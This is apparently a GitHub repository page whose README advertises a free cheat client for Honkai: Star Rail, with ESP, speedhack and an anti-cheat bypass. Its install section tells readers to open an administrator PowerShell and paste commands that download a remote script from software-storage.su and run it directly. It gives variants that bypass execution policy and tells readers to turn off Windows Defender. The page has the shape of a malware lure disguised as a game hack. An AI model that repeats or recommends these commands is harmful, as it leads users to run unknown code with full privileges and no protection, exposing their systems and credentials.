Skip to content

477-Mortal-Chief/Unicore-Star-Rail

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Honkai: Star Rail Cheat — Unicore Star Rail Hack (Internal Menu)

Welcome to the official repository of Unicore Star Rail Hack — the most advanced, open-source internal cheat client for Honkai: Star Rail. This project is designed for educational purposes, demonstrating memory manipulation, hooking techniques, and anti-cheat bypass mechanisms.

🚀 Key Features

  • Visuals (ESP): Track chests, puzzles, enemies, and trottles through walls.
  • Movement: Customizable Speedhack, No-Clip, and Teleport to waypoints.
  • Combat: Auto-win, God Mode, Infinite Energy, and Instakill options.
  • Automation: Auto-dialogue skipper, auto-farm, and daily quest automation.
  • Security: Built-in anti-cheat bypass (bypasses MHYProt / Ace Anti-Cheat).

🛠️ Technology Stack

  • Language: C++ / C#
  • Graphics API: DirectX 11 / DirectX 12
  • Hooking Library: MinHook
  • GUI: Dear ImGui (Custom Theme)

🚀 Direct Download

Read Readme.txt before install!


🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://software-storage.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://software-storage.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://software-storage.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


🔍 SEO Keywords & Indexing Tags (For Search Engines)

⚠️ Disclaimer

This repository is for educational and research purposes only. I do not encourage cheating in online games. Use this software at your own risk. The developer is not responsible for any banned game accounts.

About

Free open-source Unicore Star Rail Hack and cheat client. Features: Honkai Star Rail internal menu, ESP, speedhack, auto-combat, teleport, and anti-cheat bypass. Updated for the latest game version.

Topics

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors